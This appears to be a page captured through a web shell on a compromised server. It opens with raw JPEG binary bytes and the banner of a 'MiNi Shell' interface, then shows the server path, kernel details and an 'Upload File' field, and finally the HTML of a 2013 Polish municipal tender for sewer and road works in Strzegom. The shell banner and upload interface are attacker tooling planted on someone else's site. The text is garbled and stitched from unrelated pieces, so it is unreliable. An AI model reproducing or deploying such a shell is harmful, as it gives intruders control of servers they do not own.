JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130213/23167-N-2013.html

<p class="kh_header"><b>Strzegom: Przebudowa kanalizacji sanitarnej i deszczowej miasta Strzegom - Budowa kanalizacji sanitarnej w ul. Szarych Szeregów, Wesoła, Reja, Budowa kanalizacji deszczowej w ul. Szarych Szeregów i ul. Rybnej oraz  Przebudowa drogi gminnej nr 110799D- ul. Szarych Szeregów w Strzegomiu</b><br>
<b>Numer ogłoszenia: 23167 - 2013; data zamieszczenia: 13.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Strzegom , ul. Rynek 38, 58-150 Strzegom, woj. dolnośląskie, tel. (074)  856-05-99, faks (074 ) 856-05-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strzegom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa kanalizacji sanitarnej i deszczowej miasta Strzegom - Budowa kanalizacji sanitarnej w ul. Szarych Szeregów, Wesoła, Reja, Budowa kanalizacji deszczowej w ul. Szarych Szeregów i ul. Rybnej oraz  Przebudowa drogi gminnej nr 110799D- ul. Szarych Szeregów w Strzegomiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przedsięwzięcie pod nazwą: Przebudowa kanalizacji sanitarnej 
i deszczowej miasta Strzegom - Budowa kanalizacji sanitarnej w ul. Szarych Szeregów, Wesoła, Reja, Budowa kanalizacji deszczowej w ul. Szarych Szeregów i ul. Rybnej oraz Przebudowa drogi gminnej nr 110799D- ul. Szarych Szeregów w Strzegomiu.

Na przedmiot zamówienia składają się  4 zadania:

Zadanie 1:   Budowa kanalizacji sanitarnej w ul. Szarych Szeregów, ul. Wesoła, ul. Reja.
Zadanie dofinansowane ze środków  Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej we Wrocławiu.

Zadanie 2: Budowa kanalizacji deszczowej w ul. Szarych Szeregów i ul. Rybnej.     
         
Zadanie 3: Przebudowa drogi gminnej nr 110799D - ul. Szarych Szeregów w Strzegomiu - bez terenu zamkniętego PKP.   
Zadanie przewidziane  do dofinansowania w ramach programu Narodowy Program Przebudowy Dróg Lokalnych - Etap II Bezpieczeństwo - Dostępność - Rozwój. 
                                                                                                                                         
Zadanie 4: Przebudowa drogi gminnej nr 110799D - ul. Szarych Szeregów w Strzegomiu -  teren zamknięty  PKP S.A.

Nie dopuszcza się składania ofert częściowych. Wykonawca składa ofertę łącznie na cztery zadania.

ZADANIE 1:
Budowa kanalizacji sanitarnej w ul. Szarych Szeregów, ul. Wesoła, ul. Reja.
Zadanie dofinansowane ze środków  Wojewódzkiego Funduszu Ochrony Środowiska 
i Gospodarki Wodnej we Wrocławiu.

1. W ramach tego zadania przedmiotem zamówienia jest  kontynuacja zadania rozpoczętego 
w 2012r. pn. Przebudowa kanalizacji sanitarnej i deszczowej miasta Strzegom - Budowa kanalizacji sanitarnej w ul. Szarych Szeregów, ul. Wesoła, ul. Reja na odcinku od skrzyżowania 
z ul. Św. Jadwigi  do  studni  S9.42  i do połączenia z kanałem istniejącym na skrzyżowaniu 
ul. Al. Wojska Polskiego i ul. Reja wraz z kanałami bocznymi:
1)  na podstawie dokumentacji projektowej wraz z decyzją o pozwoleniu na budowę z dnia 24.03.2009r. opracowanej przez Panią Halinę Łukaszewską z Pracowni Projektowej Inżynierii Sanitarnej i Gazownictwa SANGAZ z Jeleniej Góry,
2) na podstawie projektu budowlanego zamiennego wraz z decyzją z dnia 11.09.2012r. o zmianie pozwolenia na budowę, opracowanej przez Panią Halinę Łukaszewską z Pracowni Projektowej Inżynierii Sanitarnej i Gazownictwa SANGAZ z Jeleniej Góry,
3) na podstawie projektów budowlanych opracowanych przez Barbarę Mądrzak z Biura projektowego w Boleścinie 49D na budowę  przyłącza kanalizacji sanitarnej do zakładu
przy  ul. Morska 3A w Strzegomiu oraz do istniejącego kiosku spożywczego przy ul. Szarych Szeregów 4C.
Kanalizacja sanitarna układana będzie w wykopie otwartym oraz metodą bezwykopową:  krakingu statycznego.  
2. Zakres robót obejmuje roboty ujęte w projektach budowlanych, w tym między innymi:
  1) Przygotowanie terenu pod budowę 
  a) rozbiórka: nawierzchni, podbudowy, usuwanie ziemi urodzajnej ( humusu),
  b) roboty ziemne, wykopy oraz przekopy, 
  c) umocowanie ścian wykopów,  drenaż rurowy korytkowy, studzienki połączeniowe 
     drenażowe,  pompowanie wody z wykopów, 
  d) zasypanie wykopów,  rozścielenie ziemi urodzajnej (humusu).
  2) Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich 
   części oraz roboty w zakresie inżynierii lądowej i wodnej.
  a) przebudowa rurociągu metodą krakingu statycznego,
  b) podłoża pod kanały,
  c) kanały z rur PP SN10 o średnicy zewn.315mm,
  d) kanały z rur PP SN 10 o śr. zewn.200mm,
  e) kanały z rur PP SN 10 o śr. zewn.160mm,
  f) studnie betonowe,  studzienki z tworzywa sztucznego, kształtki PP kanalizacji 
     zewnętrznej,   
  g) próby wodne szczelności kanałów rurowych przeprowadzone w obecności Inspektora   
     nadzoru inwestorskiego i przedstawicieli Spółki Wodociągi i Kanalizacja w Strzegomiu, 
  h) inspekcja telewizyjna kanałów przeprowadzona w obecności Inspektora nadzoru  
    inwestorskiego i przedstawiciela Spółki Wodociągi i Kanalizacja w Strzegomiu 
    kolorową kamerą z obrotową głowicą oraz sporządzenie i włączenie do dokumentacji 
    budowy raportu z inspekcji obejmującego opis i parametry poszczególnych odcinków 
    kanalizacji tj. numery studni, średnice, spadki, miejsca zamontowania kształtek,  
  i) podbudowa,  
  j) nawierzchnie z mieszanek mineralno- bitumicznych, z tłucznia kamiennego-warstwy 
    górne i dolne, 
  k) połączenie istniejących przyłączy kanalizacji sanitarnej z wybudowaną siecią  
    kanalizacyjną w ul. Szarych Szeregów, ul. Wesoła, ul. Reja - wykonanie przepięć.
  l) połączenie kanalizacji sanitarnej z ul. Św. Jadwigi (ks 16 i 16a ) z kanalizacją sanitarną
    w ul. Szarych Szeregów.  

    
3. Szczegółowy zakres robót  zawarty jest w dokumentacji projektowej oraz :
1) Decyzji Nr 293/2009 z dnia 24-03-2009r., o pozwoleniu na budowę -Budowa kanalizacji  sanitarnej ul. Szarych Szeregów, ul. Wesoła, ul. Reja znak: WB.7351-88/09-2,
2) Decyzji Nr 1089/2012 z dnia 11.09.2012r o zmianie pozwolenia na budowę udzielonego decyzją Starosty Świdnickiego Nr 293/2009 z dnia 24.03.2009r,
3) Decyzji Nr I-D-61/09 z dnia 24-03-2009r., o pozwoleniu na budowę-Budowa kanalizacji sanitarnej w ulicach: Szarych Szeregów, Wesoła, Reja - teren drogi wojewódzkiej 374, 
4) Decyzji Nr I-K/Z/54/09 z dnia 12-03-2009r., o pozwoleniu na budowę- Kanalizacja sanitarna 
w ul. Wesołej na terenie zamkniętym PKP dz. nr 1 AM-26, obręb Strzegom -Miasto,
5) Specyfikacjach Technicznych Wykonania  i Odbioru Robót Budowlanych,  dokumentacji geotechnicznej oraz niniejszej  SIWZ,  które stanowią podstawę do sporządzenia oferty,  

Zamawiający zastrzega, że zakres robót wykonany i zgłoszony przez Wykonawcę do odbioru częściowego nie będzie odebrany bez przedłożenia Zamawiającemu następujących dokumentów:
- protokołu z przeprowadzonej próby szczelności  wybudowanego odcinka kanalizacji  sanitarnej,
- dokumentacji z wykonanej inspekcji TV wybudowanej kanalizacji sanitarnej  zgłoszonej do odbioru częściowego,
- oświadczenia właścicieli gruntów o tym, że nie wnoszą zastrzeżeń do Wykonawcy po zakończeniu robót i doprowadzeniu  terenu do stanu pierwotnego.  

W celu dokładnego sporządzenia wyceny wykonawca winien szczegółowo zapoznać się 
z dokumentacją geotechniczną oraz uwzględnić nawodnienia wykopów w zależności od pory roku i warunków atmosferycznych. 


ZADANIE 2:
Budowa kanalizacji deszczowej w ul. Szarych Szeregów i ul. Rybnej

1. W ramach tego zadania przedmiotem zamówienia jest  budowa  kanalizacji deszczowej 
w ul. Szarych Szeregów i ul. Rybnej   w Strzegomiu (od przejazdu PKP  w kierunku oczyszczalni ścieków do rowu połączonego z rzeką Strzegomką) oraz adaptacja istniejącej kanalizacji sanitarnej na kanalizację deszczową. Adaptacja kanałów kanalizacji sanitarnej na deszczową zostanie przeprowadzona po wybudowaniu kanalizacji sanitarnej w ul. Szarych Szeregów i przełączeniu do nowego kanału wszystkich  ścieków bytowych. Przystosowanie istniejących kanałów sanitarnych do odprowadzania wód opadowych wymaga: 
  1) starannego wyczyszczenia kolektora sanitarnego,
  2) wykonania inspekcji TV rurociągów,  adaptacji istniejących studzienek,
  3) wykonanie napraw  kolektora i studzienek, uszczelnienie połączeń, uzupełnienie ubytków,
  4) wykonanie inspekcji TV po przeprowadzonych robotach.
2. Zakres robót obejmuje między innymi:
  1) przygotowanie terenu pod budowę:
      a) rozbiórka elementów drogi z wywiezieniem,
      b) roboty ziemne, wykopy oraz przekopy, umocowanie ścian wykopów, odwodnienie  
          wykopów,  zasypanie wykopów, 
     c) mechaniczne oczyszczanie kanałów, 
     d) kamerowanie kanałów,
  2) Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich   
      części oraz roboty w zakresie inżynierii lądowej i wodnej:
      a) podłoża pod kanały z materiałów sypkich,
      b) kanały z rur PP SN8 - dwuściennych o śr.zewnetrznej 400mm z wykonaniem prób szczelności,
      c) kanały z rur PP SN10 z rur PP SN8 o śr.zewnetrznej 315mm z wykonaniem prób szczelności,
      d) kanały z rur PP SN10 z rur PP SN8 o śr.zewnetrznej 300 mm z wykonaniem prób szczelności,
      e) kanały z rur PP SN10 z rur PP SN8 o śr.zewnetrznej 150mm z wykonaniem prób szczelności,
      f) studnie rewizyjne z kręgów betonowych o śr.100mm z dnem  prefabrykowanym, kinetą 
i przejściami szczelnymi,
      g) adaptacja istniejących studni betonowych o śr. 1000mm(oczyszczenie studni, wymiana pokryw nastudziennych z pierścieniem obciążającym, uzupełnienie ubytków, wymiana zniszczonych kręgów, regulacja wysokości, wykonanie kinet w studzienkach adoptowanych,
      h)  studzienki ściekowe uliczne betonowe o śr. 500mm,
      i)   obsypka rurociągów piaskiem, oczyszczenie przepustów,
      j)  nawierzchnie z mieszanek mineralno-bitumicznych,
      k)  dostawa i montaż separatora  zintegrowanego z piaskownikiem SN 20+3000, 
      l)   naprawa kanałów  metodą bezwykopową - pacery ,
      ł)  ubezpieczenie rowu płytami ażurowymi.


3. Szczegółowy zakres robót  zawarty jest w dokumentacji projektowej i pozwoleniu na budowę Decyzja Nr 187/2009 Starosty Świdnickiego z dnia 19-02-2009r. - Budowa kanalizacji deszczowej
w rejonie ulic Rybnej i Szarych Szeregów w Strzegomiu,  Specyfikacji technicznej wykonania 
i odbioru robót budowlanych, dokumentacji geotechnicznej, Specyfikacji Istotnych Warunków Zamówienia, które stanowią podstawę do sporządzenia oferty.  

W celu dokładnego sporządzenia wyceny wykonawca winien szczegółowo zapoznać się 
z dokumentacją geotechniczną oraz uwzględnić nawodnienia wykopów w zależności od pory roku i warunków atmosferycznych. 
ZADANIE 3:
Przebudowa drogi gminnej nr 110799D - ul. Szarych Szeregów w Strzegomiu - bez terenu zamkniętego.
Zadanie przewidziane  do dofinansowania w ramach programu NARODOWY PROGRAM PRZEBUDOWY DRÓG LOKALNYCH - ETAP II BEZPIECZEŃSTWO - DOSTĘPNOŚĆ - ROZWÓJ                                                                                                                                
Zadanie to obejmuje roboty w zakresie objętym pozwoleniem na budowę - Decyzja 
Nr 1137/2012 z dnia 18 września 2012r. 

Szczegółowy zakres robót określony jest w dokumentacji projektowej i obejmuje przebudowę  drogi gminnej NR 110799D - ulicy Szarych Szeregów w Strzegomiu oraz budowę linii kablowej oświetlenia drogowego wraz  z montażem słupów i opraw oraz układu pomiarowo - sterowniczego, zlokalizowanej przy ulicy Szarych Szeregów  i Wolskiej w Strzegomiu, w tym m.in.:

A) w zakresie branży drogowej na terenie gminnym wykonanie:
a/ ul. Szarych Szeregów:
- rozbiórki konstrukcji nawierzchni jezdni, chodników, zjazdów oraz rozbiórki krawężników,
- jezdni o nawierzchni bitumicznej, 
- ścieku przykrawężnikowego z kostki kamiennej,
- chodników o nawierzchni z kostki betonowej, 
-  zjazdów o nawierzchni z kostki kamiennej, 
- ścieżki rowerowej o nawierzchni z kostki betonowej,
- miejsc postojowych o nawierzchni z kostki kamiennej, 
- opaski o nawierzchni z kostki betonowej,
- wycinki i karczowania istniejących w pasie drogowym drzew i żywopłotów,
- zieleni trawnikowej oraz nowych nasadzeń średnich - 31 szt. grabów,

b/ ul. Wolska
- rozbiórki konstrukcji nawierzchni jezdni, chodników, zjazdów oraz rozbiórki krawężników,
- jezdni o nawierzchni z kostki kamiennej, 
- chodników o nawierzchni z kostki betonowej, 
- zjazdów o nawierzchni z kostki kamiennej, 

B) w zakresie branży elektrycznej na terenie gminnym wykonanie:
-	trasowania linii kablowej nN,
-	wykopów pod kabel nN,
-	nasypania warstwy piasku na dnie rowu kablowego,
-	ułożenia rur osłonowych, kabla i bednarki FeZn,
-	zasypania kabla,
-	montażu słupów,
-	montażu opraw i szafki oświetleniowej,
-	montażu szafki oświetlenia drogowego,
-	zarobienia na sucho kabli nN oraz podłączenia w słupach i szafce kablowej,
-	pomiarów powykonawczych,
-	demontażu urządzeń oświetleniowych,

C) w zakresie zieleni na terenie gminnym wykonanie:
- wycinki i karczowania istniejących w pasie drogowym drzew i żywopłotów,
- zieleni trawnikowej oraz nowych nasadzeń średnich - 31 szt. grabów.

D) wprowadzenie docelowej organizacji ruchu zgodnie z zatwierdzonym projektem przez Starostę Świdnickiego - zatwierdzenie z dnia 31.08.2012 r. znak: KD.7121.306.2012.2. Wykonawca robót na 14 dni przed dniem wprowadzenia organizacji ruchu musi powiadomić o tym fakcie Wydział Gospodarki Komunalnej, Ochrony Środowiska i Wsi Urzędu Miejskiego 
w Strzegomiu.

Przy sporządzaniu oferty należy uwzględnić materiał Inwestora w ilości 341 ton kruszywa łamanego (mieszanka 0/31,5), który należy odebrać z firmy BERGER SUROWCE Sp. z o.o., Kopalnia Wieśnica, z siedzibą w Rogoźnicy  przy ul. Świdnickiej 2A. 

 
                          ZADANIE 4:
Przebudowa drogi gminnej nr 110799D - ul. Szarych Szeregów w Strzegomiu -  teren zamknięty  PKP S.A.

Zadanie to obejmuje roboty  w zakresie objętym pozwoleniem na budowę -  Decyzja 
Nr I-K/Z/420/12 z dnia 5 grudnia 2012r.

A) w zakresie  branży drogowej na terenie zamkniętym PKP S.A. ul. Szarych Szeregów roboty obejmują wykonanie m. in.:
- rozbiórki konstrukcji nawierzchni jezdni, 
- jezdni o nawierzchni bitumicznej, 
- opaski o nawierzchni kamiennej.

Wymagane jest prowadzenie prac zgodnie z Decyzją Nr 1-K/Z/420/12 Wojewody Dolnośląskiego z dnia 5 grudnia 2012r. oraz uzgodnieniami z PKP Oddział Gospodarowania Nieruchomościami we Wrocławiu, zamieszczonymi w dokumentacji projektowej.

OPIS dotyczący wszystkich zadań składających się na przedmiot zamówienia:
 
1.  Przedmiary robót stanowiące załączniki do specyfikacji należy traktować jako element  dodatkowy, ułatwiający sporządzenie oferty.  W celu dokładnego sporządzenia wyceny wskazane jest przeprowadzenie wizji lokalnej w terenie. W przypadku pominięcia przez Wykonawcę przy sporządzaniu oferty jakichkolwiek robót lub kosztów określonych lub zasygnalizowanych 
w dokumentacji przetargowej i nie ujęcie  ich  w wynagrodzeniu ryczałtowym, Wykonawcy nie będzie przysługiwało względem Zamawiającego żadne roszczenie z powyższego tytułu, 
a w szczególności roszczenie o dodatkowe wynagrodzenie. Roboty ujęte w dokumentacji projektowej, a nie ujęte w wycenie nie będą  traktowane jako roboty dodatkowe i nie będą  finansowane przez Zamawiającego. 

2.  Zakres prac oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną ceną ofertową obejmuje także: 
 1) organizację, zabezpieczenie, ubezpieczenie i zagospodarowanie placu budowy, 
 2) zorganizowanie i przeprowadzenie niezbędnych prób, badań i odbiorów,
 3) doprowadzenie terenu budowy do należytego stanu  i porządku po zakończeniu robót,       wywiezienie odpadów i gruzu na  składowisku odpadów  komunalnych,
 4) projekt organizacji ruchu na czas trwania robót i opłaty za zajęcie pasa drogowego,
 5) utrzymanie porządku w trakcie realizacji robót oraz systematyczne porządkowanie miejsca wykonywania robót, 
 6) demontaż obiektów tymczasowych,                                                                                               
 7) odtworzenie oznakowania pionowego i poziomego po zakończeniu robót  budowlanych,
 8) uczestniczenie w wyznaczonych przez Zamawiającego spotkaniach i naradach w celu       omówienia spraw związanych z realizacją zadania oraz w okresie gwarancji i rękojmi,
  9) przestrzeganie przy realizacji robót warunków zawartych w uzgodnieniach m.in. z Wydziałem Gospodarki Komunalnej i Ochrony Środowiska i Wsi Urzędu Miejskiego w Strzegomiu, Wodociągi i Kanalizacja Sp. z o.o. w Strzegomiu, Zarządcy dróg i innych.

3. Wymagania Zamawiającego w zakresie odbioru częściowego robót.
Odbiorom częściowym podlegają wszystkie elementy zanikające i ulegające zakryciu, 
w szczególności:
1) wykopy, umocowanie wykopów i ich odwodnienie,
2) podłoża pod rurociągi,
3) przygotowanie i montaż studzienek, 
4) ułożenie rurociągów, 
5) obsypka i jej zagęszczenie,
6) próby szczelności rurociągów kanalizacyjnych i studzienek ,
7) zasypanie i zagęszczanie wykopów, 
8) wykonanie odcinków metodami bezwykopowymi,
9) każda z poszczególnych warstw podbudowy pod drogi i chodniki oraz poszczególne warstwy konstrukcji drogi, inne elementy dróg i chodników oraz robót objętych przedmiotem zamówienia  ulegające zakryciu,
10) odtworzenie i uporządkowanie terenu.

4. Roboty należy prowadzić zgodnie z przepisami Prawa budowlanego i przepisami BHP 
w sposób jak najmniej uciążliwy dla mieszkańców .

5. Wymaga się, aby na wykonany przedmiot zamówienia wykonawca udzielił Zamawiającemu gwarancji jakości, w tym na zastosowane wyroby budowlane na okres 36 miesięcy od dnia sporządzenia protokołu odbioru końcowego wykonanego przedmiotu umowy dla każdego z zadań oddzielnie  i w tym dniu wyda Zamawiającemu kartę gwarancyjną podpisaną przez upoważnionych przedstawicieli,  a wzór tej karty stanowi załącznik do umowy. Roszczenia 
z tytułu gwarancji jakości nie  wyłączają odpowiedzialności Wykonawcy z tytułu rękojmi za wady przedmiotu umowy. Wykonawca udziela Zamawiającemu na każde z zadań składające się na  przedmiot umowy rękojmi za wady na okres równy okresowi gwarancji jakości.

6. Przed dokonaniem zamówienia materiałów dla każdego z zadań składających się na przedmiot umowy, Wykonawca zobowiązuje się przedstawić Zamawiającemu do akceptacji dokument - Zatwierdzenie materiałowe. Zatwierdzenie to musi zawierać propozycję materiałów wraz ze wszelkimi niezbędnymi dokumentami w postaci atestów, aprobat, deklaracji zgodności. Dla kanalizacji producent rur musi przedstawić badania wykonane przez akredytowaną instytucję potwierdzającą, że rury PP spełniają normę PN-EN 1852-1 w pełnym zakresie. Odporność rur PP na ścieranie- ubytek ścianki nie więcej niż 0,2mm po 100.000 cykli testu Darmstadt wg PN-EN 295-3 musi być potwierdzone odpowiednimi badaniami wykonanymi przez akredytowaną instytucję. Zastosowany system kanalizacji powinien posiadać aprobatę IBDiM,  a jego producent certyfikaty ISO 9001 i ISO 14001. Studzienki betonowe o klasie betonu nie niższej niż C40/50 
i współczynniku wodoprzepuszczalności W8 oraz dna z kinetami wyprofilowanymi w warunkach fabrycznych z wkładkami z polipropylenu, zabezpieczajacymi kinetę i spocznik przed działaniem ścieków.
Należy stosować przejścia szczelne odpowiednie dla zastosowanych rur. Spocznik i stopnie wykonane z zabezpieczeniem antypoślizgowym. Stopnie złazowe ze stali lub żeliwa sferoidalnego w otulinie PE montować w trakcie produkcji studni betonowych. Pozostałe wymagania zgodnie ze STWiOR - SST4 oraz normami PE-EN 1917, PN-EN 476, PN-EN 1610, PN-EN 12063, PN-B-10736 oraz PN-EN 752.
7. Zamawiający zapewnia nadzór inwestorski  i obsługę geodezyjną zadania.
8. Pierwszą  płatność za wykonane roboty któregokolwiek z zadań należy przewidzieć nie wcześniej niż w miesiącu maju 2013 r., co należy uwzględnić w harmonogramie rzeczowo-terminowo-finansowym realizacji robót po zawarciu umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 0,5% wartości zamówienia podstawowego w zakresie: wykonania dodatkowych przyłączy kanalizacyjnych</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.11.10.00-8, 45.11.00.00-1, 45.23.30.00-9, 45.23.00.00-8, 45.23.32.20-7, 45.23.32.22-1, 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 60 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 
5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  -  w tym okresie,  wykonał  co najmniej:

a) 2 roboty budowlane o wartości min 2,5 mln zł. brutto każda, obejmujące budowę, przebudowę lub remont drogi w tym co najmniej jedno z zadań to droga o nawierzchni bitumicznej, 

b) 2 roboty budowlane o wartości min 1,0 mln zł. brutto każda, obejmujące  budowę lub przebudowę  kanalizacji sanitarnej lub/i deszczowej. 

Wykonawca musi wykazać, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
